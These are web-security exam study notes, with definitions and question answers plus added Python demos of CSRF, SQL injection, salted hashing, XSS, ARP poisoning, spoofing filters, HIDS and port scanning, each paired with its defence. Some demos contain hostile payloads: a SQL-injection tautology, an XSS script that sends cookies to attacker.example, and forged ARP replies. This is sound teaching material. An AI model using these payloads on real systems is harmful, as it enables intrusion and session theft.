Web security exam questions and answers (covering exam points and questions)

Part 1. Explanation of Terms, 30 points

NOTE: Give the definitions or explanations of the following terms, 5 points for each.

(1)Data Integrity

Assures that information and programs are changed only in a specified and authorized manner.

In information security, integrity means that data cannot be modified undetectably.

Integrity is violated when a message is actively modified in transit. Information security systems typically provide message integrity (for example with a message authentication code or a digital signature) in addition to data confidentiality.

(2)Information Security Audit

An information security audit is an audit of the level of information security in an organization.

(3)PKI

PKI (Public Key Infrastructure) is the set of roles, policies, hardware, software and procedures needed to create, manage, distribute, store and revoke digital certificates, which bind public keys to identities. It provides a well-conceived infrastructure for delivering security services (authentication, confidentiality, integrity and non-repudiation) in an efficient and unified style, and is a long-term solution that can support a large spectrum of security protection.

(4)X.509

In cryptography, X.509 is an ITU-T standard that defines the format of public key certificates (as well as certificate revocation lists and attribute certificates). It is the basis of most public key infrastructures (PKI) and, through attribute certificates, of Privilege Management Infrastructure (PMI).

X.509 was originally issued as the authentication framework for the X.500 directory service, which maintains a database of information about users for the provision of authentication services; the certificate profile it defines is now used by TLS/HTTPS, S/MIME, code signing and similar systems.

(5)Denial-of-Service Attack

DoS (Denial of Service) is an attempt by attackers to make a computer resource unavailable to its intended users, typically by exhausting bandwidth, connection state or processing capacity.

(6)SOA(Service-Oriented Architecture)

SOA is a flexible set of design principles used during the phases of systems development and integration in computing. A system based on a SOA will package functionality as a suite of interoperable services that can be used within multiple, separate systems from several business domains.

(7)Access Control

Access control is a system that enables an authority to control access to areas and resources in a given physical facility or computer-based information system. An access control system, within the field of physical security, is generally seen as the second layer in the security of a physical structure.

(Access control refers to exerting control over who can interact with a resource. Often but not always, this involves an authority who does the controlling. The resource can be a given building, a group of buildings, or a computer-based information system; it can also be something as simple as a restroom stall whose door is opened with a coin.)

(8)Salted Value

In cryptography, a salt consists of random bits, creating one of the inputs to a one-way function. The other input is usually a password or passphrase. The output of the one-way function can be stored (alongside the salt) rather than the password, and still be used for authenticating users. The one-way function typically uses a cryptographic hash function. A salt can also be combined with a password by a key derivation function such as PBKDF2 to generate a key for use with a cipher or other cryptographic algorithm. The benefit provided by using a salted password is that a lookup-table-assisted dictionary attack against the stored values becomes impractical, provided the salt is large enough. That is, an attacker cannot create a precomputed lookup table (i.e. a rainbow table) of hashed values (password + salt), because it would require a large computation for each salt.

(9)SOAP

SOAP is a protocol specification for exchanging structured information in the implementation of Web Services in computer networks. It relies on Extensible Markup Language (XML) for its message format, and usually relies on other Application Layer protocols, most notably Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP), for message negotiation and transmission.

(10)Confidentiality

Confidentiality is the term used to prevent the disclosure of information to unauthorized individuals or systems. Confidentiality is necessary (but not sufficient) for maintaining the privacy of the people whose personal information a system holds.

(11)Authentication

In computing, e-business and information security, authentication is the process of ensuring that data, transactions, communications or documents (electronic or physical) are genuine. It is also important for authenticity to validate that both parties involved are who they claim they are.

(12)Kerberos

Kerberos is an authentication service developed at MIT which allows a distributed system to authenticate requests for service generated from workstations.

Kerberos (standardized by the IETF in RFC 4120) is a computer network authentication protocol which works on the basis of "tickets" to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

(13)SSL/TLS

SSL and TLS are cryptographic protocols that provide communication security over the Internet. TLS and its predecessor, SSL, encrypt the segments of network connections above the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for privacy, and message authentication codes for message integrity.

(14)Man-in-the-Middle Attack

A Man-in-the-Middle Attack is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

(15)System Vulnerability

A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy (which allows an attacker to reduce a system's information assurance). Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw.

(16)Non-Repudiation

Non-repudiation refers to a state of affairs where the author of a statement will not be able to successfully challenge the authorship of the statement or validity of an associated contract.

The term is often seen in a legal setting wherein the authenticity of a signature is being challenged. In such an instance, the authenticity is being "repudiated".

(17)Bastion Host

A bastion host is a computer on a network, specifically designed and configured to withstand attacks. It is identified by the firewall admin as a critical strong point in the network's security. Firewalls (application-level or circuit-level gateways) and routers can be considered bastion hosts. Other types of bastion hosts include web, mail, DNS, and FTP servers exposed to untrusted networks.

(18)CSRF

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
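The synchronizer-token defence that follows from the definition above, as an added example that is not part of the original notes. It simulates a session store in memory (an assumption for the example; a real application would use its framework's session and form handling) and contrasts a transfer endpoint that trusts the session cookie alone with one that also demands a per-session token the attacker's page cannot read, plus the browser-supplied Sec-Fetch-Site header as a second check.

```python
import hmac
import secrets

# Constructed in-memory session store for the example
sessions = {}

def new_session(user):
    """Log a user in and bind a fresh, unguessable CSRF token to the session."""
    sid = secrets.token_hex(16)
    sessions[sid] = {"user": user, "csrf_token": secrets.token_hex(32)}
    return sid

def transfer_vulnerable(cookie_sid, form):
    """Authorises on the session cookie alone. The browser attaches that cookie
    to any cross-site POST, so a forged request is accepted: this is CSRF."""
    session = sessions.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"

def transfer_protected(cookie_sid, form, sec_fetch_site=None):
    """Synchronizer-token pattern: the POST must echo a token that only a page
    from our own origin can read (same-origin policy). Compared in constant
    time. Sec-Fetch-Site, when the browser sends it, rejects cross-site POSTs
    before the token is even looked at."""
    session = sessions.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    if sec_fetch_site not in (None, "same-origin", "none"):
        return 403, "cross-site request blocked"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"

def forged_request(cookie_sid):
    """What an attacker's page submits via an auto-submitting form: the victim's
    cookie rides along, but the attacker cannot supply the token."""
    form = {"to": "attacker", "amount": "1000"}   # constructed payload
    return (transfer_vulnerable(cookie_sid, form),
            transfer_protected(cookie_sid, form, sec_fetch_site="cross-site"))

if __name__ == "__main__":
    sid = new_session("alice")
    print("forged:", forged_request(sid))
    legit = {"to": "bob", "amount": "10", "csrf_token": sessions[sid]["csrf_token"]}
    print("legit: ", transfer_protected(sid, legit, sec_fetch_site="same-origin"))
```

Setting the session cookie with `SameSite=Lax` or `Strict` is the complementary browser-side control; the token check remains the authoritative one because older clients ignore the attribute.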

Part 2. Brief Questions, 40 points

NOTE: Answer the following HOW TO questions in brief, 8 points for each.

(1)Asymmetric Cryptographic Method.

An asymmetric encryption algorithm needs two keys: a public key and a private key. The public key and the private key form a matched pair: data encrypted with a public key can only be decrypted with the corresponding private key, and data encrypted with a private key can only be decrypted with the corresponding public key. Because encryption and decryption use two different keys, the algorithm is called asymmetric.

(Details in section 2.3.1.)

(2)Security in Cloud Computing: How to discern the Security in Cloud Computing in your point of view.

Security in the cloud is a shared responsibility: the provider must ensure that their infrastructure is secure and that their clients' data and applications are protected, while the user must take measures to fortify their application and use strong passwords and authentication measures.

(3)MD5: How to be used for password protection.

(Assigned as regular homework.)

(4)ARP Poisoning: How to carry out an ARP Cache Poisoning Attack.

(5)Vulnerabilities of Firewall: How to penetrate a firewall, illustrated with atleast 3 examples.

(6)Kerberos: How Kerberos works

(7)Packet Filtering Firewall: How to penetrate a packet filtering firewall.

(8)SQL Injection: How to carry out a SQL Injection.
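An added worked example for this question, not part of the original notes: a login query built by string concatenation against a constructed in-memory SQLite table, the classic tautology payload that bypasses it, and the parameterised query that does not. The table contents and the `PAYLOAD` string are assumptions for the demonstration.

```python
import sqlite3

def make_db():
    """Constructed in-memory user table for the example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("admin", "S3cret!pw", "admin"), ("alice", "alice-pw", "user")])
    return db

def login_vulnerable(db, username, password):
    """Builds the statement by concatenation, so quote characters in the input
    become SQL syntax. Returns the matched role, or None."""
    sql = ("SELECT role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    """Parameterised query: the driver passes values separately from the SQL
    text, so input can never change the statement's structure."""
    row = db.execute("SELECT role FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

# Tautology payload: closes the string literal, ORs in a condition that is always
# true, then comments out the password check ("--" starts a SQL line comment).
PAYLOAD = "admin' OR '1'='1' -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))   # admin
    print("safe:      ", login_safe(db, PAYLOAD, "wrong"))         # None
```

The resulting statement in the vulnerable path is `SELECT role FROM users WHERE username = 'admin' OR '1'='1' -- ' AND password = 'wrong'`: the password comparison is gone, and the first matching row (admin) is returned without a password.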

(9)RSA: How to be used for Digital Signatures.

(10)Salted Value: How to be used to enhance Hash security.
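One example serving the salted-value definition in Part 1, the MD5 password question (3) and this question (10); it is added here and is not part of the original notes. The wordlist is a constructed stand-in for an attacker's precomputed table. Unsalted MD5 is reversed by a single table lookup; the PBKDF2-HMAC-SHA256 record stores a random per-user salt and an iteration count, so two users with the same password get different hashes and every guess costs the attacker the full iteration count.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for an attacker's precomputed table
WORDLIST = ["123456", "password", "letmein", "qwerty"]

def store_md5(password):
    """The weak scheme: a bare, unsalted MD5. Equal passwords give equal digests,
    and one precomputed table reverses every user's hash with a single lookup."""
    return hashlib.md5(password.encode()).hexdigest()

def crack_with_table(digest):
    """Attacker side: build the table once, reuse it against every stored hash."""
    table = {store_md5(w): w for w in WORDLIST}
    return table.get(digest)

def store_salted(password, iterations=600_000):
    """Salted, iterated hash (PBKDF2-HMAC-SHA256). The 16-byte random salt is
    stored beside the hash: it is not secret, it only makes every hash unique,
    so a table would have to be rebuilt per salt. The iteration count makes
    each guess expensive."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_salted(password, stored):
    """Re-derive with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def demo(iterations=50_000):
    """Returns (cracked md5 password, salted records differ, good verify, bad verify)."""
    weak = store_md5("password")
    a = store_salted("password", iterations)
    b = store_salted("password", iterations)      # same password, different record
    return (crack_with_table(weak), a != b,
            verify_salted("password", a), verify_salted("wrong", a))

if __name__ == "__main__":
    print(demo())   # ('password', True, True, False)
```

The 600,000 default matches current OWASP guidance for PBKDF2-HMAC-SHA256; a memory-hard function (scrypt, Argon2) is the better choice where available, but the salt-plus-work-factor structure shown here is the same.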

(11)Stateful Inspection Firewall: How to penetrate a stateful firewall.

(12)XSS: How to carry out an XSS Attack.
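An added example for this question, not part of the original notes: a search page that reflects the query back into the HTML unescaped, the same page with output encoding applied, and two constructed payloads, one for the element context and one that breaks out of a quoted attribute. The `attacker.example` host and the page markup are assumptions for the demonstration.

```python
import html
import re

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def search_page_vulnerable(query):
    """Reflects the query into the page untouched: if it contains <script>, the
    browser runs that script in the site's origin, with the victim's cookies."""
    return f'<h1>Results for: {query}</h1><input name="q" value="{query}">'

def search_page_safe(query):
    """Escapes the HTML metacharacters (& < > " ') so the payload is shown as
    text. quote=True is what protects the value="..." attribute context."""
    q = html.escape(query, quote=True)
    return f'<h1>Results for: {q}</h1><input name="q" value="{q}">'

def reflects_script(page):
    """Rough indicator for this demo only: does a real <script> start tag or an
    unescaped event-handler attribute survive into the output?"""
    return bool(SCRIPT_TAG.search(page)) or ' onfocus="' in page

# Constructed payloads (attacker.example is a reserved example domain)
ELEMENT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)'

def demo():
    """For each payload: (script survives in vulnerable page, survives in safe page)."""
    return [(reflects_script(search_page_vulnerable(p)),
             reflects_script(search_page_safe(p)))
            for p in (ELEMENT_PAYLOAD, ATTRIBUTE_PAYLOAD)]

if __name__ == "__main__":
    print(demo())                                   # [(True, False), (True, False)]
    print(search_page_safe(ATTRIBUTE_PAYLOAD))
```

Encoding must match the context the data lands in (HTML body, attribute, JavaScript string, URL); `html.escape` covers the first two. Marking the session cookie `HttpOnly` and shipping a Content-Security-Policy limit the damage when an escape is missed.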

(13)PDCA Cycle or Deming Ring method: How to be used in Implementation of ISM.

(14)DES: How the DES secret key is expanded and managed (the key schedule).

The key schedule of DES

The figure illustrates the key schedule for encryption, the algorithm which generates the subkeys. Initially, 56 bits of the key are selected from the initial 64 by Permuted Choice 1 (PC-1); the remaining eight bits are either discarded or used as parity check bits. The 56 bits are then divided into two 28-bit halves; each half is thereafter treated separately. In successive rounds, both halves are rotated left by one or two bits (specified for each round), and then 48 subkey bits are selected by Permuted Choice 2 (PC-2): 24 bits from the left half, and 24 from the right. The rotations (denoted by "<<<" in the diagram) mean that a different set of bits is used in each subkey; each bit is used in approximately 14 out of the 16 subkeys.

The key schedule for decryption is similar: the subkeys are used in reverse order compared to encryption. Apart from that change, the process is the same as for encryption. The same 28 bits are passed to all rotation boxes.

(15)IP Spoofing: How to carry out an IP Spoofing attack.

What Is a Spoofing Attack?

A spoofing attack is when a malicious party impersonates another device or user on a network in order to launch attacks against network hosts, steal data, spread malware or bypass access controls. There are several different types of spoofing attacks that malicious parties can use to accomplish this. Some of the most common methods include IP address spoofing attacks, ARP spoofing attacks and DNS server spoofing attacks.

IP Address Spoofing Attacks

IP address spoofing is one of the most frequently used spoofing attack methods. In an IP address spoofing attack, an attacker sends IP packets from a false (or “spoofed”) source address in order to disguise itself. Denial-of-service attacks often use IP spoofing to overload networks and devices with packets that appear to be from legitimate source IP addresses.

There are two ways that IP spoofing attacks can be used to overload targets with traffic.

One method is to simply flood a selected target with packets from multiple spoofed addresses. This method works by directly sending a victim more data than it can handle. The other method is to spoof the target's IP address and send packets from that address to many different recipients on the network. When another machine receives a packet, it will automatically transmit a packet to the sender in response. Since the spoofed packets appear to be sent from the target's IP address, all responses to the spoofed packets will be sent to (and flood) the target's IP address.

IP spoofing attacks can also be used to bypass IP address-based authentication. This process can be very difficult and is primarily used when trust relationships are in place between machines on a network and internal systems. Trust relationships use IP addresses (rather than user log ins) to verify machines’ identities when attempting to access systems. This enables malicious parties to use spoofing attacks to impersonate machines with access permissions and bypass trust-based network security measures.

ARP Spoofing Attacks

ARP is short for Address Resolution Protocol, a protocol that is used to resolve IP addresses to MAC (Media Access Control) addresses for transmitting data. In an ARP spoofing attack, a malicious party sends spoofed ARP messages across a local area network in order to link the attacker’s MAC address with the IP address of a legitimate member of the network. This type of spoofing attack results in data that is intended for the host’s IP address getting sent to the attacker instead. Malicious parties commonly use ARP spoofing to steal information, modify data in-transit or stop traffic on a LAN. ARP spoofing attacks can also be used to facilitate other types of attacks, including denial-of-service, session hijacking and man-in-the-middle attacks. ARP spoofing only works on local area networks that use the Address Resolution Protocol.
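The ARP poisoning attack described here (and asked about in Part 2, question 4), shown from both sides as an added example that is not part of the original notes: the two unsolicited ARP replies an attacker emits to sit between a victim and its gateway, serialised exactly as they would go on the wire, and an arpwatch-style detector that flags the IP-to-MAC change. MAC and IP addresses are constructed for the example; sending the frames for real would need a raw socket and is not done here.

```python
import struct

ETH_P_ARP = 0x0806

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Serialise an Ethernet frame carrying an ARP reply (opcode 2): the 14-byte
    Ethernet header followed by the 28-byte ARP body for IPv4 over Ethernet."""
    eth = struct.pack("!6s6sH", target_mac, sender_mac, ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 2,
                      sender_mac, sender_ip, target_mac, target_ip)
    return eth + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if the frame is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return op, smac, sip, tmac, tip

def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)

class ArpWatcher:
    """Remembers the first MAC seen for each IP and alerts when a later frame
    claims a different one, which is the signature of poisoning."""
    def __init__(self):
        self.table, self.alerts = {}, []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        op, smac, sip, _, _ = parsed
        ip, mac = ip_str(sip), mac_str(smac)
        known = self.table.setdefault(ip, mac)
        if known != mac:
            self.alerts.append(f"ARP change for {ip}: {known} -> {mac} (opcode {op})")

# Constructed LAN: gateway, victim and attacker
GATEWAY_MAC, GATEWAY_IP = bytes.fromhex("001122334455"), bytes([192, 168, 1, 1])
VICTIM_MAC, VICTIM_IP = bytes.fromhex("66778899aabb"), bytes([192, 168, 1, 10])
ATTACKER_MAC = bytes.fromhex("deadbeef0001")

def poisoning_frames():
    """Both directions are poisoned so the attacker can relay (man in the middle):
    tell the victim 'gateway is at my MAC', tell the gateway 'victim is at my MAC'."""
    return [build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
            build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)]

def run_demo():
    """Feed legitimate traffic, then the attack; return the detector's alerts."""
    w = ArpWatcher()
    w.observe(build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    w.observe(build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP))
    for frame in poisoning_frames():
        w.observe(frame)
    return w.alerts

if __name__ == "__main__":
    print("\n".join(run_demo()))
```

Because hosts accept unsolicited replies and overwrite their cache, the attacker needs no reply-to-request timing at all; it just keeps re-sending. Countermeasures are static ARP entries for critical hosts, Dynamic ARP Inspection on managed switches, and encrypted protocols so that a successful relay yields nothing readable.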

DNS Server Spoofing Attacks

The Domain Name System (DNS) is a system that associates domain names with IP addresses. Devices that connect to the internet or other private networks rely on the DNS for resolving the host names in URLs, email addresses and other human-readable domain names into their corresponding IP addresses. In a DNS server spoofing attack, a malicious party modifies DNS records (on the authoritative server or in a resolver's cache) in order to reroute a specific domain name to a different IP address. In many cases, the new IP address will be for a server that is actually controlled by the attacker and contains files infected with malware. DNS server spoofing attacks are often used to spread computer worms and viruses.

Spoofing Attack Prevention and Mitigation

There are many tools and practices that organizations can employ to reduce the threat of spoofing attacks. Common measures that organizations can take for spoofing attack prevention include:

Packet filtering: Packet filters inspect packets as they are transmitted across a network. Packet filters are useful in IP address spoofing attack prevention because they are capable of filtering out and blocking packets with conflicting source address information (packets from outside the network that show source addresses from inside the network and vice-versa).

Avoid trust relationships: Organizations should develop protocols that rely on trust relationships as little as possible. It is significantly easier for attackers to run spoofing attacks when trust relationships are in place because trust relationships only use IP addresses for authentication.

Use spoofing detection software: There are many programs available that help organizations detect spoofing attacks, particularly ARP spoofing. These programs work by inspecting and certifying data before it is transmitted and blocking data that appears to be spoofed.

Use cryptographic network protocols: Transport Layer Security (TLS), Secure Shell (SSH), HTTP Secure (HTTPS) and other secure communications protocols bolster spoofing attack prevention efforts by encrypting data before it is sent and authenticating data as it is received.
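The packet-filtering measure above, applied to the reflection attack described earlier, as an added example that is not part of the original notes. It is the ingress/egress (BCP 38) rule a site border router enforces: packets arriving from the Internet may not claim an inside source, and packets leaving may not carry a foreign one, which is exactly what a reflection attacker launched from inside the site needs. The site prefixes and the sample traffic are constructed for the example.

```python
import ipaddress

# Constructed site prefixes; the rule is only as good as this list
INTERNAL = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL)

def filter_packet(direction, src, dst):
    """Anti-spoofing rule (BCP 38 / RFC 2827 style) at the site border.
    direction: 'in' = arriving from the Internet, 'out' = leaving the site.
    Returns ('drop', reason) or ('accept', None)."""
    ip = ipaddress.ip_address(src)
    if ip.is_loopback or ip.is_multicast or ip.is_unspecified:
        return "drop", "impossible source address"
    if direction == "in" and is_internal(src):
        return "drop", "inbound packet claims an internal source"
    if direction == "out" and not is_internal(src):
        return "drop", "outbound packet with a foreign source (local host is spoofing)"
    return "accept", None

def reflection_attack_packets(victim_ip, reflectors):
    """What a reflection/amplification attacker inside our site emits: requests
    whose source is forged to the victim, so every reflector answers the victim."""
    return [("out", victim_ip, r) for r in reflectors]

SAMPLE = [                                      # constructed traffic
    ("in", "198.51.100.7", "10.0.0.5"),         # normal inbound
    ("out", "10.0.0.5", "198.51.100.7"),        # normal outbound
    ("in", "10.1.2.3", "10.0.0.5"),             # Internet packet claiming an inside source
    ("in", "127.0.0.1", "10.0.0.5"),            # bogon
] + reflection_attack_packets("203.0.113.9", ["198.51.100.53", "198.51.100.123"])

def apply_filter(packets=SAMPLE):
    """Run the rule over (direction, src, dst) tuples; returns [(packet, verdict)]."""
    return [(p, filter_packet(*p)) for p in packets]

if __name__ == "__main__":
    for packet, (verdict, reason) in apply_filter():
        print(f"{verdict:6} {packet} {reason or ''}")
```

The egress half is the one most sites forget: it does nothing for the site's own protection, but it is what stops the site from being the source of a spoofed flood, and it is why reflection attacks depend on networks that have not deployed it.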

(16)HIDS: How to carry out Intrusion Detection by making use of HIDS.
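An added example for this question, not part of the original notes: the file-integrity core of a host-based IDS in the style of Tripwire or AIDE. A baseline of hashes and permission bits is taken while the host is known-good and stored away from the monitored tree; later scans are compared against it and any added, deleted, modified or re-permissioned file is reported. The scenario runs in a temporary directory with constructed "system" files.

```python
import hashlib
import json
import os
import tempfile

def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root):
    """Hash and stat every regular file under root; paths are relative to root."""
    db = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            rel = os.path.relpath(p, root).replace(os.sep, "/")
            db[rel] = {"sha256": hash_file(p), "mode": os.stat(p).st_mode & 0o777}
    return db

def save_baseline(db, path):
    with open(path, "w") as f:
        json.dump(db, f)

def load_baseline(path):
    with open(path) as f:
        return json.load(f)

def compare(baseline, current):
    """List (finding, path) pairs, one per file whose state changed."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            findings.append(("deleted", path))
        elif path not in baseline:
            findings.append(("added", path))
        elif current[path]["sha256"] != baseline[path]["sha256"]:
            findings.append(("modified", path))
        elif current[path]["mode"] != baseline[path]["mode"]:
            findings.append(("permissions", path))
    return findings

def demo():
    """Constructed scenario: baseline a fake /etc, then an intruder adds a uid-0
    user to passwd, drops a cron backdoor and deletes hosts."""
    root = tempfile.mkdtemp()
    etc = os.path.join(root, "etc")

    def write(rel, text):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as f:
            f.write(text)

    write("etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
    write("etc/hosts", "127.0.0.1 localhost\n")
    write("etc/shadow", "root:!:19000::::::\n")
    # The baseline lives outside the monitored tree (in practice: read-only media or a central server)
    save_baseline(snapshot(etc), os.path.join(root, "baseline.json"))

    write("etc/passwd", "root:x:0:0:root:/root:/bin/bash\nhacker:x:0:0::/:/bin/sh\n")
    write("etc/cron.d/backdoor", "* * * * * root /tmp/.x\n")
    os.remove(os.path.join(etc, "hosts"))
    return compare(load_baseline(os.path.join(root, "baseline.json")), snapshot(etc))

if __name__ == "__main__":
    for finding, path in demo():
        print(f"{finding:12} {path}")
```

Integrity checking is only one HIDS sensor; the same agent typically also tails authentication logs and watches process and listening-port lists. All of them depend on the baseline being trustworthy, so it must be taken before exposure and protected from the host it describes.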

Part 3. Essay Questions, 30 points

NOTE: Discuss the following questions in detail, 10 points for each.

(1)Discuss some PORT SCAN Software you ever used, including the usage and the running result analysis.
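An added example, not part of the original notes, showing what a port scanner actually measures: a TCP connect() scan (the equivalent of `nmap -sT`) run against a fake service the block starts on a loopback port it obtains from the OS. A completed handshake is reported as open, an immediate RST as closed, and a timeout as filtered, which is how a silently dropping firewall shows up in scan output.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

def _listener(sock):
    """Accept and immediately close connections; stands in for a real service."""
    while True:
        try:
            conn, _ = sock.accept()
            conn.close()
        except OSError:            # listening socket closed: stop
            return

def start_fake_service():
    """Constructed target: a listener on a loopback port chosen by the OS."""
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))
    s.listen(5)
    threading.Thread(target=_listener, args=(s,), daemon=True).start()
    return s, s.getsockname()[1]

def free_closed_port():
    """Reserve then release an ephemeral port so we know one that is closed."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

def connect_scan(host, ports, timeout=0.5, workers=32):
    """TCP connect() scan. Completed three-way handshake -> 'open';
    RST (ConnectionRefusedError) -> 'closed'; no answer within the timeout ->
    'filtered' (something dropped the SYN). Returns {port: state}."""
    def probe(port):
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return port, "open"
        except ConnectionRefusedError:
            return port, "closed"
        except (TimeoutError, socket.timeout, OSError):
            return port, "filtered"
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(probe, ports))

def scan_demo():
    """Start the fake service, scan it plus a known-closed port, then stop it."""
    srv, open_port = start_fake_service()
    closed_port = free_closed_port()
    try:
        results = connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return open_port, closed_port, results

if __name__ == "__main__":
    open_port, closed_port, results = scan_demo()
    for port in sorted(results):
        print(f"{port}/tcp {results[port]}")
```

A connect() scan completes the handshake, so the target's service logs the connection; nmap's default SYN scan (`-sS`, needs raw sockets) sends a RST after the SYN/ACK instead. Either way the three states above are what the result analysis turns on: an unexpected "open" is an exposed service, and "filtered" across a whole range is a firewall rather than an empty host.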

(2)Discuss the mechanisms of Buffer Overflow in illustration of some realexample.

(3)Select one from the OWASP Top Ten Threats to Web Applications 2013 and discuss the mechanisms, citing in illustration.

(4)Discuss the mechanisms of IPSec in Transport Mode.

(5)Discuss the mechanisms of IPSec in Tunnel Mode.

(6)The web server vulnerabilities may cause some kinds of attacks. Try to find them and discuss the consequences in brief.

(7)Discuss the mechanisms of SSL and show me how it works with HTTP.

mechanisms of SSL

SSL uses a combination of public key and symmetric key encryption to secure a connection between two machines, typically a web or mail server and a client system, communicating over the internet or another TCP/IP network. SSL provides a mechanism for encrypting and authenticating data sent between processes running on a client and server.

SSL runs above the transport layer and the network layer, which are responsible for the transport of data between processes and the routing of network traffic over a network between client and server, respectively, and below application layer protocols such as HTTP and the Simple Mail Transfer Protocol. The "sockets" part of the term refers to the sockets method of passing data between a client and a server program in a network or between processes in the same computer.

How Does HTTPS Work?

HTTPS pages typically use one of two secure protocols to encrypt communications: SSL (Secure Sockets Layer) or TLS (Transport Layer Security). Both the TLS and SSL protocols use what is known as an 'asymmetric' Public Key Infrastructure (PKI) system. An asymmetric system uses two 'keys', a 'public' key and a 'private' key. Anything encrypted with the public key can only be decrypted by the private key, and a signature made with the private key can only be verified with the public key.

As the names suggest, the 'private' key should be kept strictly protected and should only be accessible to the owner of the private key. In the case of a website, the private key remains securely ensconced on the web server. Conversely, the public key is intended to be distributed to anybody and everybody that needs to encrypt information for the server or to verify signatures the server has made with its private key.

What is a HTTPS certificate?

When you request a HTTPS connection to a webpage, the website will initially send its SSL certificate to your browser. This certificate contains the public key needed to begin the secure session. Based on this initial exchange, your browser and the website then perform the 'SSL handshake'. The SSL handshake involves the generation of shared secrets to establish a uniquely secure connection between yourself and the website.

When a trusted SSL Digital Certificate is used during a HTTPS connection, users will see a padlock icon in the browser address bar. When an Extended Validation Certificate was installed on a web site, browsers of the time turned the address bar green; current browsers no longer give EV certificates a distinct indicator.

How does HTTPS actually work?

27 Mar 2014

1. What is HTTPS and what does it do?

HTTPS takes the well-known and understood HTTP protocol, and simply layers a SSL/TLS (hereafter referred to simply as "SSL") encryption layer on top of it. Servers and clients still speak exactly the same HTTP to each other, but over a secure SSL connection that encrypts and decrypts their requests and responses. The SSL layer has 2 main purposes:

• Verifying that you are talking directly to the server that you think you are talking to

• Ensuring that only the server can read what you send it and only you can read what it sends back

The really, really clever part is that anyone can intercept every single one of the messages you exchange with a server, including the ones where you are agreeing on the key and encryption strategy to use, and still not be able to read any of the actual data you send.

2. How an SSL connection is established

An SSL connection between a client and server is set up by a handshake, the goals of which are:

• To satisfy the client that it is talking to the right server (and optionally vice versa)

• For the parties to have agreed on a "cipher suite", which includes which encryption algorithm they will use to exchange data

• For the parties to have agreed on any necessary keys for this algorithm

